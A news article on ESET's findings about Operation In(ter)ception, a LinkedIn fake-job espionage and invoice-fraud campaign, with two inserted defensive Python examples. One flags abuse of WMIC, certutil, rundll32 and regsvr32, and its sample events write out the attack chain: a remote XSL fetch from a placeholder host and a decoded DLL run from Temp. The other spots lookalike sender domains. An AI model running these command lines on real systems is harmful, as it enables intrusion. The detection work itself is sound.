Operation In(ter)reception: Hackers target targets Military and Aerospace employees in Europe and the Middle East

Cyber Warfare Asia · Jun 18, 2020


Security researchers from ESET have uncovered a new, sophisticated cyber-espionage campaign directed against aerospace and military organizations in Europe and the Middle East, aimed at spying on key employees of the targeted firms and, in some cases, even at siphoning money.

The campaign, dubbed Operation In(ter)ception because of a reference to “Inception” in a malware sample, took place between September and December 2019, according to a new report from cybersecurity firm ESET.

“The primary goal of the operation was espionage,” the researchers told The Hacker News. “However, in one of the cases we investigated, the attackers tried to monetize access to a victim’s email account through a business email compromise (BEC) attack as the final stage of the operation.”

The financial motivation behind the attacks, coupled with similarities in targeting and development environment, has led ESET to suspect the Lazarus Group, a notorious hacking group that has been attributed to working on behalf of the North Korean government to fund the country’s illicit weapons and missile programs.

Social Engineering via LinkedIn

Stating that the campaign was highly targeted, ESET said it relied on social engineering: employees of the chosen companies were lured with fake job offers sent through LinkedIn’s messaging feature by attackers posing as HR managers of well-known companies in the aerospace and defense industry, including Collins Aerospace and General Dynamics.

Experts noticed that the attackers relied on legitimate Windows utilities rather than custom loaders: WMIC to interpret remote XSL scripts, certutil to decode base64-encoded downloaded payloads, and rundll32 and regsvr32 to run their custom malware.
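Because the four utilities named above are ordinary signed Windows binaries, blocking them outright is rarely practical; the usual defensive answer is process-creation telemetry plus rules on their arguments. The following Python is an added example (not code from the article or from ESET) that applies such rules to a handful of constructed process-creation events. The pipe-delimited event format is an assumption, and every host, user, URL and path in the sample is a constructed placeholder.

```python
"""Flag the living-off-the-land binaries named in the report when they run
with arguments that fit the described behaviour.

Added example, not from the article or from ESET. The event format below
(pipe-delimited: timestamp|host|user|parent|image|commandline) is an
assumption, and every event, host, user, URL and path is constructed.
"""
import re
from dataclasses import dataclass

# Constructed process-creation events: three that fit the described tradecraft
# on WS01 and two benign uses of the same binaries on WS02.
SAMPLE_EVENTS = r"""
2019-10-02T09:14:03Z|WS01|jdoe|cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic os get /format:"http://lure.example.invalid/style.xsl"
2019-10-02T09:14:09Z|WS01|jdoe|cmd.exe|C:\Windows\System32\certutil.exe|certutil -decode C:\Users\jdoe\AppData\Local\Temp\blob.txt C:\Users\jdoe\AppData\Local\Temp\blob.dll
2019-10-02T09:14:15Z|WS01|jdoe|cmd.exe|C:\Windows\System32\rundll32.exe|rundll32 C:\Users\jdoe\AppData\Local\Temp\blob.dll,Start
2019-10-02T09:20:00Z|WS02|asmith|explorer.exe|C:\Windows\System32\wbem\WMIC.exe|wmic computersystem get model
2019-10-02T09:21:00Z|WS02|asmith|services.exe|C:\Windows\System32\regsvr32.exe|regsvr32 /s C:\Windows\System32\vbscript.dll
"""

# Each rule pairs a name with a case-insensitive pattern that is applied to
# "<image> <commandline>", so it works whether the log records a full path or
# just the binary name.
RULES = [
    # WMIC asked to render its output through an XSL stylesheet fetched over HTTP.
    ("wmic-remote-xsl",
     re.compile(r'\bwmic(\.exe)?\b.*/format:\s*["\']?https?://', re.I)),
    # certutil used as a base64 decoder rather than for certificate work.
    ("certutil-decode",
     re.compile(r'\bcertutil(\.exe)?\b.*\s-decode\b', re.I)),
    # rundll32 / regsvr32 loading a DLL from a user-writable location.
    ("rundll32-user-writable-dll",
     re.compile(r'\brundll32(\.exe)?\b.*\\(users|programdata|temp)\\', re.I)),
    ("regsvr32-user-writable-dll",
     re.compile(r'\bregsvr32(\.exe)?\b.*\\(users|programdata|temp)\\', re.I)),
]


@dataclass
class Alert:
    rule: str
    timestamp: str
    host: str
    user: str
    parent: str
    commandline: str


def parse_events(text):
    """Split the constructed pipe-delimited events into dicts, skipping blanks."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, parent, image, cmd = line.split("|", 5)
        events.append({"ts": ts, "host": host, "user": user,
                       "parent": parent, "image": image, "cmd": cmd})
    return events


def detect(events, rules=RULES):
    """Return one Alert per (event, rule) match, in event order."""
    alerts = []
    for ev in events:
        haystack = f"{ev['image']} {ev['cmd']}"
        for name, pattern in rules:
            if pattern.search(haystack):
                alerts.append(Alert(name, ev["ts"], ev["host"], ev["user"],
                                    ev["parent"], ev["cmd"]))
    return alerts


def scan(text=SAMPLE_EVENTS):
    """Parse and evaluate a block of events; returns the list of Alerts."""
    return detect(parse_events(text))


if __name__ == "__main__":
    for a in scan():
        print(f"{a.timestamp} {a.host} {a.user} [{a.rule}] "
              f"parent={a.parent} :: {a.commandline}")
```

On the sample, only the three WS01 events raise alerts; the benign WMIC inventory query and the service-driven regsvr32 of a System32 DLL on WS02 pass, which is the point of keying on arguments and load paths rather than on the binary name alone. The parent process is carried through in each alert because, in real telemetry, the chain that spawned the utility is usually the fastest way to confirm or dismiss a hit.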

ESET researchers also discovered that the threat actors behind Operation In(ter)ception attempted to use compromised accounts within the target organizations to launch BEC attacks against other businesses.

The BEC attempts monitored by ESET failed because the intended victims contacted the compromised organizations directly to ask for more information about the requests.

“First, leveraging existing communication in the victim’s emails, the attackers tried to manipulate a customer of the targeted company to pay a pending invoice to their bank account. For further communication with the customer, they used their own email address mimicking the victim’s,” the report continues.

“Here, the attackers were unsuccessful — rather than paying the invoice, the customer responded with inquiries about the requested sum. As the attackers urged the customer to pay, the customer ended up contacting the victim’s correct email address about the issue, raising an alarm on the victim’s side.”
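In the scenario just quoted the attack collapsed only because the customer happened to write to the victim’s real address. The following Python is an added example (not from the article or the ESET report) of automating that same comparison on the receiving side: a reply arriving in an existing invoice thread is checked for a From address that merely resembles the correspondent already in the thread, and for a Reply-To that quietly diverts answers elsewhere. The correspondent list, messages, addresses and domains are all constructed (the .example TLD is reserved for documentation), and the edit-distance threshold is an assumption.

```python
"""Screen a reply in an existing invoice thread for a sender that merely
resembles the correspondent we have been dealing with.

Added example, not from the article or the ESET report. The correspondent
list, the messages and every address and domain are constructed (.example is
reserved for documentation); the distance threshold is an assumption.
"""
from email import message_from_string
from email.utils import parseaddr

# Addresses we have genuinely exchanged mail with in this thread (constructed).
KNOWN_CORRESPONDENTS = {"accounts@contoso-aero.example"}


def levenshtein(a, b):
    """Edit distance; catches one- or two-character domain lookalikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(addr):
    return addr.rsplit("@", 1)[-1].lower()


def classify_sender(from_addr, reply_to="", known=KNOWN_CORRESPONDENTS):
    """Return (verdict, reason) for the From/Reply-To pair of a thread reply."""
    from_addr = from_addr.lower()
    reply_to = reply_to.lower()
    if from_addr in known:
        # Visible From is right, but answers would go to a different mailbox.
        if reply_to and reply_to != from_addr:
            return "suspicious", f"Reply-To {reply_to} diverts replies away from {from_addr}"
        return "ok", "known correspondent"
    sender_domain = domain_of(from_addr)
    for k in known:
        known_domain = domain_of(k)
        if sender_domain == known_domain:
            return "review", f"new mailbox on known domain {known_domain}"
        # Same name with a few characters changed, or the known name embedded
        # in a longer one (e.g. contoso-aero-billing.example).
        if (levenshtein(sender_domain, known_domain) <= 2
                or known_domain.split(".")[0] in sender_domain):
            return "suspicious", f"{sender_domain} resembles known domain {known_domain}"
    return "review", "unknown sender replying inside an existing thread"


def screen_message(raw, known=KNOWN_CORRESPONDENTS):
    """Parse one RFC 822 message and classify its sender."""
    msg = message_from_string(raw)
    _, from_addr = parseaddr(msg.get("From", ""))
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    verdict, reason = classify_sender(from_addr, reply_to, known)
    return {"subject": msg.get("Subject"), "from": from_addr,
            "verdict": verdict, "reason": reason}


# Constructed messages: one genuine reply and two that mimic it.
GENUINE_REPLY = """From: Accounts <accounts@contoso-aero.example>
To: ap@customer.example
Subject: Re: Invoice 4471
Message-ID: <a1@contoso-aero.example>

The invoice is attached as discussed.
"""

LOOKALIKE_DOMAIN = """From: Accounts <accounts@contoso-aer0.example>
To: ap@customer.example
Subject: Re: Invoice 4471
In-Reply-To: <a1@contoso-aero.example>

Following up on the pending invoice.
"""

DIVERTED_REPLY_TO = """From: Accounts <accounts@contoso-aero.example>
Reply-To: accounts@contoso-aero-billing.example
To: ap@customer.example
Subject: Re: Invoice 4471

Following up on the pending invoice.
"""

if __name__ == "__main__":
    for raw in (GENUINE_REPLY, LOOKALIKE_DOMAIN, DIVERTED_REPLY_TO):
        r = screen_message(raw)
        print(f"{r['verdict']:10} {r['from']:40} {r['reason']}")
```

The genuine reply classifies as ok, the zero-for-o domain and the diverted Reply-To both as suspicious, and an unrelated sender inside the thread as review. Pairing a check like this with a standing rule that any change of bank details is confirmed by phone at a number already on file removes the dependence on an alert customer that the report describes.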

Additional details on the attacks, including Indicators of Compromise (IoCs) and MITRE ATT&CK techniques, are reported in the paper published by the experts.
